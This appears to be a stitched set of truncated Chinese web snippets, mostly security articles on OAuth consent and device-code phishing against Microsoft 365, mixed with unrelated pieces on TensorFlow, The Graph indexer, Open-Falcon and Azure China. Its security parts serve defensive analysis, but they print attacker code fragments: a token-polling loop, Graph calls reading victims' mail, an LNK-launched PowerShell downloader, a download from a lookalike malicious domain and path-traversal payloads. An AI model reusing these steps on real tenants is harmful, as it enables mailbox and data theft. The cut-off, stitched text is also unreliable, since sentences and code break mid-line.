此类攻击不依赖凭据窃取,而是滥用OAuth 2.0授权框架中的“用户同意”流程,使恶意应用获得长期有效的刷新令牌(refresh token),进而通过Microsoft Graph API静默读取邮件...在此基础上,提出一套覆盖身份治理、条件访问、应用审计与用户教育的纵深防御体系,并给出关键策略配置与监控代码示例。...);用户点击“接受”,微软返回授权码;应用用授权码向令牌端点兑换访问令牌与刷新令牌;应用使用令牌调用Microsoft Graph API。...'}return requests.post(url, data=data).json()随后,通过Graph API执行恶意操作:# 读取最近100封邮件headers = {'Authorization...:Microsoft Graph 查询示例:GET https://graph.microsoft.com/v1.0/me/oauth2PermissionGrantsAuthorization: Bearer
、策略治理与用户教育的三层防御体系;第六部分通过代码示例展示典型攻击场景与检测逻辑;最后总结全文并指出未来研究方向。...典型场景中,受害者收到伪装成Windows更新失败或CAPTCHA验证的页面,被要求复制一段PowerShell或CMD命令并粘贴至终端执行。此类命令通常会下载恶意载荷、建立持久化后门或禁用安全软件。...攻击目标不再是静态密码,而是动态的、具有时效性的授权令牌;攻击载体不再是可执行文件,而是合法云服务的API接口。这一变化对企业的安全边界提出了全新挑战。...(二)策略管理层:建立授权生命周期管理定期授权审计:每季度导出全组织应用授权清单,清理未使用或来源不明的应用;实施最小权限原则:推动业务部门使用权限更细的现代API(如Microsoft Graph的delegated...permissions with scopes);自动化撤销机制:当检测到可疑活动时,自动调用Microsoft Graph API撤销相关应用授权:# 使用Microsoft Graph API撤销用户授权
你有没有收到过这样的邮件?“您的 Microsoft 账户需要立即完成安全验证。请访问 https://aka.ms/devicelogin,输入以下代码:**ABCD-EFGH**。”...一旦用户输入代码并点击“下一步”,系统会要求其使用 Microsoft 365 账户登录——此时 MFA 可能被触发,用户收到短信或 Authenticator 推送通知,并完成验证。...Graph API 窃取数据breakelif token_resp.json().get("error") == "authorization_pending":time.sleep(5)else:...print("❌ 授权失败:", token_resp.text)break一旦拿到 access_token,攻击者即可调用 Microsoft Graph API 执行任意操作:# 示例:读取受害者最近...'from']['emailAddress']['address']}")“整个过程完全合法,使用的是微软公开的 API。”
microsoft graph的api,一次调用10个api,5个onedrive的api还有4个outlook的api,剩下一个是组的api,调用一次后延时等待五分钟再重复调用。...但是原作者的代码需要在服务器上运行,成本较高。后来又有一位大佬找到了不用服务器也可以运行的的办法。而后者的方法是建立在前者的基础上的,因此我将他们的教程融合了起来,并对其中的个别词语进行了微调。...记录ID 下面会用到 点击左边管理的证书和密码,点击+新客户端密码,点击添加,复制新客户端密码的值 记录这个值 下面会用到 点击左边管理的API权限,点击+添加权限,点击常用Microsoft API...里的Microsoft Graph(就是那个蓝色水晶), 点击委托的权限,然后在下面的条例搜索以下12个 最后点击底部添加权限 Calendars.ReadWrite 、 Contacts.ReadWrite...(I understand my workflow...)
本文旨在深入解析凭证窃取主导下的现代攻击链演化机制,并基于零信任架构原则,构建覆盖预防、检测、响应全生命周期的身份安全防御体系。...典型场景包括:邮件+Teams/Slack消息联动:先发送看似合法的发票邮件,再通过即时通信工具“跟进”:“您收到财务部的付款请求了吗?请尽快确认。”...(Microsoft Graph PowerShell)枚举用户;利用New-MailboxExportRequest导出高管邮箱;部署Cobalt Strike Beacon并通过合法CDN分发勒索载荷...= f"https://graph.microsoft.com/v1.0/oauth2PermissionGrants/{g['id']}"requests.delete(del_url, headers...5.3 SOAR联动强制轮换(TheHive/Cortex 示例)当Stealer Logs中出现user@company.com:password123,SOAR工作流自动执行:调用Microsoft
查看TensorFlow官方文档或相关的教程,了解有关新版本中所引入的更改和更新的信息。这样,你就可以更新你的代码并解决这个错误。...通过查询当前TensorFlow版本并更新代码,你可以解决这个错误。记住,TensorFlow有不断更新的技术生态系统,查看官方文档和社区教程以了解最新的更改和更新非常重要。...下面是一个使用旧版本TensorFlow代码遇到该错误的示例:pythonCopy codeimport tensorflow as tf# 定义一个简单的神经网络模型def my_model():...# 训练模型 # ...# 调用模型my_model()在这个示例中,我们定义了一个简单的神经网络模型,并在模型的开始部分尝试调用tf.reset_default_graph()来重置默认图...# 训练模型 # ...# 调用模型my_model()在这个示例中,我们删除了旧版本代码中的tf.reset_default_graph()调用。
编写智能合约[1]时,通常状态的变化是通过触发一个事件来表达,The Graph 则是捕捉区块链事件并提供一个查询事件的 GraphQL 接口,让我们可以方便的跟踪数据的变化。...并使用相应的字段填充数据,最后需要.save()来存储实体。...然后使用 graph deploy 进行部署: graph deploy \ --debug \ --node https://api.thegraph.com/deploy/ \...subgraph索引 当索引完成后,通过 Graph Explorer 中的 GraphQL playground 进行交互查询: ? GraphQL查询 4....DApp 前端查询索引数据 在我们的代码库中,front 目录中,已经提供一个 示例 DApp,用来访问数据。
加上把GraphQL[7]作为一种非常方便的查询语言放在上面,这就是 The Graph 了,不过是作为一种中心化服务。 总之,The Graph 允许以一种更有效的方式查询区块链的数据。...委托人将他们的 GRT 借给索引器,并收到部分查询费作为回报。他们不能因为索引器的不当行为而被削减他们的 GRT,而且每个索引器通过委托获得的 GRT 是有限制的。 以下是各方参与示意图: 3....在其目前的设计中,支付是由 The Graph 团队直接处理的,你创建一个 API 密钥来查询数据。以后一旦实现了可验证的查询,用户将直接付款。...$ graph auth --studio my-subgraph-id> (见 Subgraph Studio UI) $ graph codegen && graph build。...$ graph deploy --studio my-subgraph-id>。 现在你可以在 Subgraph Studio 中点击 发布。
本文聚焦于2025年披露的一类高隐蔽性钓鱼攻击:攻击者诱导用户授权伪装成合法工具的恶意OAuth应用,利用其申请的高权限API作用域(如Mail.Read、Files.ReadWrite.All),在无需密码或一次性验证码的情况下访问邮箱...针对此威胁,本文提出一套涵盖身份治理、行为监控与自动化响应的纵深防御框架,并提供可部署的PowerShell审计脚本、YARA规则及条件访问策略配置示例。...本文不依赖厂商宣传或推测性归因,而是基于公开可验证的日志数据、应用注册元数据及API调用模式,深入剖析此类攻击的技术实现逻辑,并据此构建可落地的防御体系。...(Access Token)与刷新令牌(Refresh Token);应用使用令牌调用Microsoft Graph API。...3.4 数据窃取与横向移动获得令牌后,攻击者可调用Microsoft Graph API执行以下操作:# 读取最新100封邮件Invoke-RestMethod -Uri "https://graph.microsoft.com
攻击者通过伪造IT部门通知、安全警报或软件更新提示,诱使用户访问看似合法的指令页面,并要求其在https://microsoft.com/devicelogin 输入一串六位字母数字组合的设备代码。...Graph API,读取邮件、日历、联系人,甚至创建新应用或修改权限。...假设攻击者已注册一个Azure AD应用,client_id为“a1b2c3d4-5678-90ef-ghij-klmnopqrstuv”,并申请了以下API权限:Microsoft Graph: Mail.ReadWrite...随后,攻击者可使用该令牌调用Graph API:# Example: Read user's mailboxheaders = {'Authorization': f'Bearer {token_json...["access_token"]}'}mail_resp = requests.get('https://graph.microsoft.com/v1.0/me/messages',headers=headers
transfer会把接收到的数据,转发给graph。 监听端口为6071,校验方法如下,返回ok表示服务正常。...5.Dashboard http:8081 Dashboard是面向用户的查询界面,在这里,用户可以看到push到graph中的所有数据,并查看其趋势图。...transfer的数据来源,一般有三种 falcon-agent采集的基础监控数据 falcon-agent执行用户自定义的插件返回的数据 client library: 线上的业务系统,都嵌入使用了统一的...这些都是靠graph和API组件来实现的,transfer会将数据往graph组件转发一份,graph收到数据以后,会以rdtool的数据归档方式来存储,同时提供查询的RPC接口....API面向终端用户,收到查询请求后,会去多个graph里面,查询不同metric的数据,汇总后统一返回给用户. 存储 对于监控系统来讲,历史数据的存储和高效率查询,永远是一个很难的问题!
近期变种更倾向使用ISO或LNK文件绕过邮件网关:# 恶意LNK文件执行PowerShell下载器%windir%\System32\WindowsPowerShell\v1.0\powershell.exe...(2.4)横向移动与持久化获取邮箱访问权后,攻击者常利用“自动转发规则”窃取未来邮件,或通过Graph API读取联系人、会议记录,为下一轮攻击提供情报。...(如常用登录地点、邮件收发时段、协作平台使用频率),检测异常:若某议员账户在凌晨3点从境外IP访问并创建邮件转发规则,触发告警;若短时间内向大量非联系人发送含附件邮件,疑似被控为跳板。...(5.1)系统架构前端:Outlook插件,提供举报按钮与可疑链接预览;中台:基于Microsoft Graph API的行为分析引擎;后台:条件访问策略管理与OAuth授权审计模块。...(5.2)关键功能代码示例自动检测并阻断恶意邮件转发规则:from microsoft_graph import GraphClientdef detect_malicious_forwarding(user_id
API 1.Open Graph可以让广大用户发现你的应用或者业务 2.可以加入更多社交内容,你的朋友可能会对你的内容感兴趣 3.使用Facebook Login统一登录,可以减少投入,并且可以跨不同设备...The Graph API Explorer API Explorer是一个低级工具,使用它开发者可以查询,添加和删除相关数据。对开发者开发应用非常有帮助。 ?...所有的东西在Open Graph中都有ID Graph API使用的HTTP请求,GET for read, POST for modify & add, DELETE to remove nodes....示例:你可以在左边选择请求的类型(GET,POST or DELETE),以及任何需要修改的数据。 ?...Login, Authorization and Permissions 登录,授权和权限 使用Graph API访问数据需要先理解的几个专业术语。
dashboard是面向用户的查询界面。在这里,用户可以看到push到graph中的所有数据,并查看其趋势图。...[root@hadoop /usr/local/falcon-mail-provider]# 测试成功,正常收到了邮件: 把发送邮件的接口地址配置到alarm组件中。...cursor.execute(metric_info[1]) # 获取查询结果,并组装成metric_list columns = cursor.description for row...添加我们编写的脚本并赋予可执行权限: [root@hadoop /usr/local/open-falcon]# mkdir agent/plugin/presto [root@hadoop /usr/...使用Python2.7编写的自定义push数据到open-falcon的脚本示例代码: #!
一封来自 no-reply@teams.mail.microsoft.com 的邮件静静躺在某跨国制造企业IT主管的收件箱里。主题是:“你在‘财务Q4结算’会议中被提及”。...Microsoft Teams作为全球超3亿用户使用的协作平台,其通知邮件由微软官方域名 teams.mail.microsoft.com 发出,具备完整的SPF、DKIM、DMARC认证。...以下是一段简化版的PowerShell命令,用于从伪装站点下载并静默执行远程工具:# 伪装为“微软安全更新”$uri = "https://update-microsoft-support[.]xyz/...邮件层:增强Teams通知监控限制Teams外部邀请:在Microsoft 365管理中心配置策略,禁止非组织成员创建团队或邀请用户;监控异常团队命名:通过Microsoft Graph API定期扫描团队名称...,识别含“PayPal”“Billing”“Urgent”等关键词的可疑实体;# 示例:通过Graph API列出所有团队GET https://graph.microsoft.com/v1.0/groups
文中提供了可落地的技术方案,包括精确匹配的重定向URI白名单配置、条件访问策略绑定设备指纹、自动化影子应用审计脚本等,并通过代码示例验证其有效性。...向令牌端点换取访问令牌与刷新令牌;Client使用访问令牌调用受保护资源(如Microsoft Graph API)。...获得令牌后,攻击者通过Microsoft Graph API执行侦察:import requeststoken = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.xxxxx"headers...可使用Microsoft Graph PowerShell批量设置:# 禁止用户同意应用Set-MgPolicyAuthorizationPolicy -PermissionGrantPolicyId...以下Python脚本利用Microsoft Graph API实现自动化审计:import requestsfrom datetime import datetime, timedeltadef audit_shadow_apps
以下是返回sam的用户信息的其中之一的API调用示例: POST /bff/proxy/orchestra/get-user HTTP/1.1Host: app.starbucks.com{ "data...Sam做的第一件事是尝试遍历API调用,以便可以加载其他路径,而执行此操作的方式是发送以下负载: /bff/proxy/orchestra/get-user/..%2f/bff/proxy/orchestra...最终,在返回7条路径后,sam收到了以下错误: GET /bff/proxy/v1/me/streamItems/web\..\.\..\.\..\.\..\.\..\.\..\.\..\ HTTP/1.1Host...“ / search / v1 / accounts”可以访问所有星巴克帐户的Microsoft Graph实例。...随后,sam开始进一步探索该服务,以使用Microsoft Graph功能进行确认。
全文结构如下:第二部分剖析攻击链各阶段的技术细节;第三部分评估现有防御体系的局限性;第四部分提出多层防御机制并辅以代码示例;第五部分总结研究发现并指出未来防御演进方向。...Tool”的应用,申请Mail.ReadWrite、Files.Read.All、User.Read等高权限范围,并诱导用户授权(或利用已窃取的管理员令牌静默授权)。...搜索并下载敏感文档:利用Graph API遍历OneDrive与SharePoint中的文件夹,下载包含“NDA”、“Term Sheet”、“Due Diligence”等关键词的文档。...可集成Zscaler Private Access或Cloudflare Browser Isolation,并通过KQL查询识别高风险邮件:// KQL: 检测含OneDrive链接但发件域异常的邮件...以下Python脚本利用Microsoft Graph API实现授权审计:import requestsdef audit_oauth_apps(user_token):headers = {"Authorization
构建在 The Graph 之上 本文中,我们将研究这样一个协议:The Graph[15],以及如何使用存储在以太坊区块链中的数据来构建和部署自己的 GraphQL API。...subgraph 定义了你希望通过 GraphQL API 提供的数据、数据源和数据访问模式。开发者可以选择直接使用别人已经部署[17]的 subgraph,或者自己定义并部署 subgraph。...开发者可以通过将他们的 subgraph 部署到托管服务或网络中来创建开放的 API,根据其 API 的使用量来收费。...在 Graph 浏览器中创建项目 首先,请打开Graph Explorer[25],并登录或创建一个新账户。...图表仪表板 当你点击 subgraph 的时候,就会打开 Graph explorer: ? 佐拉subgraph 查询数据 现在我们在仪表板中了,可以开始查询数据了。
Services Mesh applications Preview Metrics Monitor Multi-Factor Authentication My...Resource Graph Explorer Resource Graph queries Resource groups RevAPM CDN Roles...Resource Graph Explorer Resource Graph queries Resource groups Roles Route filters...所以不能只看刚才列表里列出的服务,就算已经落地了,功能上也是有区别的。 技术以外的区别 国内使用Azure服务必须遵守中国相关法律法规。...某些行业符合敏感数据不出境的规定 国内Azure价格计算器: https://www.azure.cn/zh-cn/pricing/ 国际版Azure价格计算器: https://azure.microsoft.com